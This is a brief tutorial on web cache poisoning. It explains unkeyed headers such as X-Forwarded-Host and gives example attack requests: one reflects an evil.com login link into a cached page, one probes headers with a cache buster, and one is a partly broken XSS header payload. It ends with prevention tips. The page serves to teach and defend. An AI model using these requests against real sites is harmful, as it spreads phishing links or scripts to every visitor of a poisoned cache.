Key Takeaways
- Cache poisoning makes caches serve malicious content to all users.
- Unkeyed inputs: Headers that affect response but aren't in cache key.
- Leads to mass XSS, redirects, and DoS.
- Different from cache deception (targets individual users).
Web caches improve performance by storing responses. If an attacker can inject malicious content that gets cached, every user receiving that cached response is affected. One request, thousands of victims.
How Web Caching Works
Caches typically key on: Host + Path + Query string. Headers like X-Forwarded-Host often affect the response but aren't included in the cache key—these are "unkeyed inputs."
Basic Cache Poisoning
# Attacker crafts request with unkeyed header
GET /page HTTP/1.1
Host: example.com
X-Forwarded-Host: evil.com
# Response reflects evil.com (in links, scripts, etc.)
HTTP/1.1 200 OK
<a href="https://evil.com/login">Login</a>
# This response gets cached!
# All subsequent users receive poisoned pageFinding Unkeyed Inputs
# Test headers one by one with cache buster
GET /page?cachebuster=123 HTTP/1.1
Host: example.com
X-Forwarded-Host: test123
# Check response for reflection:
# - Link URLs changed?
# - Script sources modified?
# - Redirects affected?
# Common unkeyed headers:
X-Forwarded-Host
X-Forwarded-Scheme
X-Original-URL
X-Rewrite-URL
PragmaExploitation Examples
XSS via X-Forwarded-Host
GET / HTTP/1.1
Host: target.com
X-Forwarded-Host: ">
# Cached response:
<link rel="canonical" href="https://">/"/>Prevention
- Include all response-affecting inputs in cache key
- Disable unnecessary headers in backend
- Use Vary header correctly
- Validate and sanitize all header inputs
- Regular cache purging after deployments
Frequently Asked Questions
What's the difference between cache poisoning and cache deception?
Poisoning affects everyone (attacker poisons, all receive bad content). Deception targets individuals (attacker tricks victim into caching their sensitive data, then retrieves it).
Master web attacks.
HTTP Smuggling Guide